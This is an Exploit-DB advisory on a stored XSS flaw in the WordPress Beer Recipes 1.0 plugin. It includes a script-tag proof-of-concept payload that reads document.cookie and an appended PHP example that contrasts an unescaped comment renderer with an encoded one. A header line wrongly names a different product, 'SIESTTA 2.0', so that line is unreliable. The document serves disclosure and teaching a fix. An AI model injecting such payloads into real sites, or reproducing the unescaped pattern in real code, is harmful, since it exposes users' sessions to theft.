WordPress Plugin Beer Recipes 1.0 – Cross-Site Scripting

  • Author: TheUzuki.'
    Date: 2011-06-26
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/17453/
  • # Exploit Title: WordPress - Beer Recipes v.1.0 XSS
    # Google Dork: -
    # Date: June / 25 / 2011
    # Author: TheUzuki.'
    # Software Link: http://opensourcebrew.org/beer-recipes-plugin/
    # Version: v.1.0
    # Tested on: Windows 7
    # CVE : -
    
    ####################################################################
    # SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities
    # download: http://opensourcebrew.org/beer-recipes-plugin/
    #
    # Author: TheUzuki.' from HF
    # mail: uzuki[@]live[dot]de
    #
    #
    # This was written for educational purposes. Use it at your own risk.
    # The author will not be responsible for any damage.
    #
    ####################################################################
    #
    # Notes: You need to be a user on the WordPress board
    #
    ####################################################################
    
    --Description of WordPress Plugin--
    
    Creates a custom post type for easily entering beer recipes into WordPress
    
    --Exploit--
    
    When a comment containing JavaScript is posted on a beer recipe, the JavaScript gets executed directly.
    This causes an XSS.
    
    --PoC--
    
    <script>alert(document.cookie)</script>
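
The comment-rendering flaw described above, seen from the fixing side, as an added example that is not part of the original advisory and is not the plugin's own code: a plain-PHP comment renderer written first without output encoding and then with it. The function names and the comment array layout are hypothetical; inside WordPress the same encoding is done with `esc_html()`.

```php
<?php
// Added example: not the Beer Recipes plugin's code. The comment array layout
// and all function names below are hypothetical.

// Constructed sample: one benign comment and one carrying the advisory's PoC.
$comments = [
    ['author' => 'brewer1', 'text' => 'Great stout, mashed at 67 C.'],
    ['author' => 'visitor', 'text' => '<script>alert(document.cookie)</script>'],
];

// Vulnerable pattern: stored comment fields are concatenated into the page
// as-is, so any markup in them becomes part of the document.
function render_comments_vulnerable(array $comments): string
{
    $html = "<ul class=\"recipe-comments\">\n";
    foreach ($comments as $c) {
        $html .= '<li><b>' . $c['author'] . '</b>: ' . $c['text'] . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Hardened pattern: encode every user-controlled field at output time.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_comments_hardened(array $comments): string
{
    $html = "<ul class=\"recipe-comments\">\n";
    foreach ($comments as $c) {
        $html .= '<li><b>' . e($c['author']) . '</b>: ' . e($c['text']) . "</li>\n";
    }
    return $html . "</ul>\n";
}

// Regression check for a test suite: a raw script tag must not survive rendering.
function contains_raw_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

var_dump(contains_raw_script(render_comments_vulnerable($comments)));
var_dump(contains_raw_script(render_comments_hardened($comments)));
echo render_comments_hardened($comments);
```

The hardened renderer emits the PoC as `&lt;script&gt;...`, which the browser displays as text instead of running it.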